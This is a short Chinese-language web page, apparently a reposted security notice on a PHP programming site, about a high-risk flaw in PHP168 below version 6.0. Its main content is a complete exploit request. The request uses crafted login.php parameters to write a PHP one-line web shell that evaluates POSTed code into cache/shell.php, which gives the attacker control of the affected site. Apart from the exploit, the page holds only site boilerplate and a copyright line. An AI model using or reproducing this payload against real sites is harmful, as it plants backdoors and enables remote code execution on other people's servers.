網(wǎng)(LieHuo.Net)教程 最近在研究PHP,那個(gè)勁啊,就甭提鳥(niǎo),本文引自黑客動(dòng)畫(huà)吧。
| 以下為引用的內(nèi)容: 危險(xiǎn)等級(jí):高 影響版本:PHP168 6.0以下版本 入侵者可以在用戶登陸頁(yè)面構(gòu)造特殊語(yǔ)句,將PHP一句話寫(xiě)入cache目錄,從而獲得使用PHP168整站程序網(wǎng)站的WEBSHELL權(quán)限。 出問(wèn)題的文件 login.php login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?> 寫(xiě)到:cache/shell.php |
程序員人生,我編程,我富裕,記住wfuyu網(wǎng),php教程,php學(xué)習(xí),php手冊(cè),CMS模版制作
聲明:本站大部分內(nèi)容是作者原創(chuàng),少部分收集于互聯(lián)網(wǎng)供大家一起學(xué)習(xí),原版權(quán)很多不明,如有侵權(quán)請(qǐng)聯(lián)系本站,謝謝!
粵ICP備14040726號(hào)-1?? 2015-2020 程序員人生 版權(quán)所有
